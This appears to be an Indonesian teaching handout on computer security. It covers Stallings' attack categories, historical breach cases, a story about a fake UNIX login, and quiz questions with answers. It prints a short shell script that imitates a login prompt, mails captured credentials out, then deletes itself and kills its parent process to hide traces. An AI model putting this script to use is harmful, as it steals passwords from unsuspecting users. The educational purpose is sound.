Jelaskan serangan serangan terhadap keamanan komputer menurut W. stalling

Menurut W. Stallings [William Stallings, “Network and Internetwork Security,” Prentice

Hall, 1995.] serangan (attack) terdiri dari :

  • Interruption: Perangkat sistem menjadi rusak atau tidak tersedia. Serangan ditujukan kepada ketersediaan (availability) dari sistem. Contoh serangan adalah “denial of service attack”.
  • Interception: Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari serangan ini adalah penyadapan (wiretapping).
  • Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik web site.
  • Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seperti e-mail palsu ke dalam jaringan komputer.
SECURITY BREACH ACCIDENT
1996 U.S. Federal Computer Incident Response Capability (FedCIRC) melaporkan bahwa lebih dari 2500 “insiden” di system komputer atau jaringan komputer yang disebabkan oleh gagalnya sistem keamanan atau adanya usaha untuk membobol sistem keamanan
1996 FBI National Computer Crimes Squad, Washington D.C.,  memperkirakan kejahatan komputer yang terdeteksi kurang dari 15%, dan hanya 10% dari angka itu yang dilaporkan
1997 Penelitian Deloitte Touch Tohmatsu menunjukkan bahwa dari 300 perusahaan di Australia, 37% (dua diantara lima) pernah  mengalami masalah keamanan sistem komputernya.
1996 Inggris, NCC Information Security Breaches Survey menunjukkan bahwa kejahatan komputer menaik 200% dari tahun 1995 ke 1996.  Kerugian rata-rata US $30.000 / insiden.
1998 FBI melaporkan bahwa kasus persidangan yang berhubungandengan kejahatan komputer meroket 950% dari tahun 1996 ke

tahun 1997, dengan penangkapan dari 4 ke 42, dan terbukti

(convicted) di pengadilan naik 88% dari 16 ke 30 kasus.

Dan lain-lain. Dapat dilihat di www.cert.org
Contoh akibat dari jebolnya sistem keamanan, antara lain: 
1988 Keamanan sistem mail sendmail dieksploitasi oleh RobertTapan Morris sehingga melumpuhkan sistem Internet. Kegiatan

ini dapat diklasifikasikan sebagai “denial of service attack”.

Diperkirakan biaya yang digunakan untuk memperbaiki dan hal-hal lain yang hilang adalah sekitar $100 juta. Di tahun 1990 Morris

dihukum (convicted) dan hanya didenda $10.000.

10 Maret 1997 Seorang hacker dari Massachusetts berhasil mematikan sistem telekomunikasi di sebuah airport local (Worcester,  Massachusetts) sehingga mematikan komunikasi di control tower dan menghalau pesawat yang hendak mendarat.Dia juga mengacaukan sistem telepon di Rutland, Massachusetts.

http://www.news.com/News/Item/Textonly/0,25,20278,00.html?pfv

1990 Kevin Poulsen mengambil alih system komputer telekomunikasi di Los Angeles untuk memenangkan kuis di sebuah radio local.
1995 Kevin Mitnick, mencuri 20.000 nomor kartu kredit, menyalin system operasi DEC secara illegal dan mengambil alih hubungan telpon di New York dan California.
1995 Vladimir Levin membobol bank-bank di kawasan Wallstreet, mengambil uang sebesar $10 juta.
2000 Fabian Clone menjebol situs aetna.co.id dan Jakarta mail dan membuat directory atas namanya berisi peringatan terhadap administrator situs tersebut.
2000 Beberapa web site Indonesia sudah dijebol dan daftarnya (besertacontoh halaman yang sudah dijebol) dapat dilihat di koleksi

<http://www.2600.com&gt;

2000 Wenas, membuat server sebuah ISP di singapura down
MEMAHAMI HACKER BEKERJA

Secara umum melalui tahapan-tahapan sebagai berikut :

  1. Tahap mencari tahu system komputer sasaran.
  2. Tahap penyusupan
  3. Tahap penjelajahan
  4. Tahap keluar dan menghilangkan jejak.

Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :

Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.

“Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu”, ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.

Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii

Nah sebenarnya apa sih yang terjadi ?

Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:

#!/bin/sh

###################################

# Nama program : my_login

# Deskripsi :Program kuda trojan sederhana

# versi 1.0 Nopember 1999

####################################

COUNTER=0

Cat /etc/issue

While [ “$COUNTER” –ne 2 ]

do

let COUNTER=$COIUNTER+1

echo “login: \c”

read LOGIN

stty echo

echo “password: \c”

read PASSWORD

echo “User $LOGIN : $PASSWORD” | mail

stty echo

echo

echo “Login Incorrect”

done

rm $0

kill –9 $PPID

Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:

Login:

Password:

Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.

Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan

Login:root

Password: ********

Login Incorrect

Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.

Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!

Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu

 rm $0

kill –9 $PPID

yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.

Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.

Soal 

1.  Jelaskan Konsep keamanan jaringan ?

2.    Sebutkan lima ancaman dalam Internet ?

3.    Sebutkan enam aspek keamanan jaringan ? jalaskan !

4.    Sebutkan tiga pelaku kejahatan internet ? Jelaskan!

5.    Sebutkan serangan terhadap keamanan Jaringan Menurut W. Stallings [William Stallings, “Network and Internetwork Security,” Prentice  Hall, 1995 ? jelaskan !

6.    Jelaskan Istilah-istilah keamanan jaringan Komputer di bawah ini ! 

1.    Hacking

2.    Cracker

3.    Denial of Service

4.    Theft of Information

5.    Corruption of Data

6.    Spoofing

7.    Sniffer

8.    Password Cracker

9.    Destructive Devices

10.  Scanner

Jawaban : 

1. Keamanan jaringan adalah suatu cara atau suatu system yang digunakan untuk

memberikan proteksi atau perlindungan pada suatu jaringan agar terhindar dari

berbagai ancaman luar yang mampu merusak jaringan. 

 ( http://itsguntara.blogspot.co.id/2013/07/pengertian-keamanan jaringan_6935.html )

2. Lima ancaman dalam Internet :

    1.  Hacking

    2. Cracker

    3. Sniffer

    4. Password Cracker

    5. Denial of Service

3. Enam aspek Keamanan Jaringan :

     1. Confidentiality : Inti utama aspek privacy / confidentiality adalah usaha untuk menjaga informasi dari orang yang tidak berhak mengakses. Privacy lebih kearah data-data yang sifatnya privat sedangkan confidentiality biasanya berhubungan dengan data yang diberikan ke pihak lain untuk keperluan tertentu

     2. Integrity : Aspek ini menekankan bahwa informasi tidak boleh diubah tanpa seijin pemilik informasi. Adanya virus, trojan horse / pemakai lain yang mengubah informasi tanpa ijin merupakan contoh masalah yang harus dihadapi.

     3. Availability : Aspek availability / ketersediaan berhubungan dengan ketersediaan informasi ketika dibutuhkan. Sistem informasi yang diserang / dijebol dapat menghambat / meniadakan akses ke informasi.

    4. Non-repudiation : Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi.

    5. Authentication : Aspek ini berhubungan dengan metoda untuk menyatakan bahwa informasi betul-betul asli / orang yang mengakses / memberikan informasi adalah betul-betul orang yang dimaksud.

    6. Access Control : Aspek ini berhubungan dengan cara pengaturan akses kepada informasi. Hal ini biasanya berhubungan dengan masalah authentication dan juga privacy. Access control seringkali dilakukan dengan menggunakan kombinasi user id/password atau dengan menggunakan mekanisme lain. 

     https://elsuhendie.wordpress.com/2013/02/18/aspek-aspek-dalam-keamanan jaringan/ 

4. Tiga pelaku kejahatan :

  • Costumer Acquisition : Costumer acquisition adalah usaha untuk memancing pengguna komputer   mengakses situs berbahaya atau malicious software. Terkadang event besar juga       dimanfaatkan untuk melakukan hal ini

  • Product : Product yang dimaksud adalah bagaimana penjahat dunia cyber menawarkan aplikasi-aplikasi berbahaya kepada pengguna komputer. Agar terpancing untuk menggunakan aplikasi yang ditawarkan, biasanya penjahat dunia cyber melakukan spam indexing (memanipulasi tingkat kepercayaan sebuah aplikasi) dan scareware (memanipulasi hasil scan anti-virus).

  • Partnership : Tidak hanya di dunia bisnis, di dalam dunia cybercrime pun ada yang namanya joint venture, yang di dalamnya terdapat beberapa produsen bergabung untuk menyebarkan malware mereka.  ( http://sergeantfai.blogspot.co.id/2011/01/kejahatan-dalam-internet.html )

5.  Serangan terhadap keamanan Jaringan Menurut W. Stallings : 

     1. Interruption: Perangkat sistem menjadi rusak atau tidak tersedia. Serangan

ditujukan kepada ketersediaan (availability) dari sistem. Contoh serangan adalah

“denial of service attack”.

     2. Interception: Pihak yang tidak berwenang berhasil mengakses asset atau

informasi. Contoh dari serangan ini adalah penyadapan (wiretapping).

     3. Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan

tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain

adalah mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik        web site.

     4. Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam          sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu          seperti e-mail palsu ke dalam jaringan komputer.

 ( https://ruswandar.wordpress.com/computer/security-attack-models/)

6.   1.    Hacking : Hacking atau Hacker adalah kegiatan menerobos program komputer milik orang lain atau menembus celah system orang lain secara diam-diam.

2.    Cracker : Seorang atau sekumpulan orang yang memang secara sengaja

berniat untuk merusak dan menghancurkan integritas di seluruh jaringan sistem

komputer dan tindakannya dinamakan cracking.

3.    Denial of Service : Membanjiri suatu IP address dengan data sehingga

menyebabkan crash atau kehilangan koneksinya ke internet.

4.    Theft of Information : Penyerang akan mencuri informasi rahasia dari suatu

perusahaan. Hal ini dapat dilakukan dengan menggunakan program pembobol

password, dan lain-lain.

5.    Corruption of Data : Penyerang akan merusak data yang selama ini disimpan

dalam harddisk  suatu host.

6.    Spoofing : sebuah bentuk kegiatan pemalsuan di mana seorang hacker

memalsukan (to masquerade) identitas seorang user hingga dia berhasil secara

ilegal logon atau login ke dalam satu jaringan komputer seolah-olah seperti user

yang asli.

7.    Sniffer : kata lain dari “network analyser” yang berfungsi sebagai alat untuk

memonitor jaringan komputer. Alat ini dapat dioperasikan hampir pada seluruh

tipe protokol seperti Ethernet, TCP/IP, IPX, dan lainnya.

8.    Password Cracker : sebuah program yang dapat membuka enkripsi sebuah

password atau sebaliknya malah untuk mematikan sistem pengamanan password.

9.    Destructive Devices : sekumpulan program virus yang dibuat khusus untuk

melakukan penghancuran data-data, di antaranya Trojan Horse, Worms, Email

Bombs, dan Nukes.

10.  Scanner : sebuah program yang secara otomatis akan mendeteksi kelemahan

(security weaknesses) sebuah komputer di jaringan lokal (local host) ataupun

komputer di jaringan dengan lokasi lain (remote host).

( https://nujo.wordpress.com/2010/01/15/istilah-istilah-keamanan-jaringan/ )


Page 2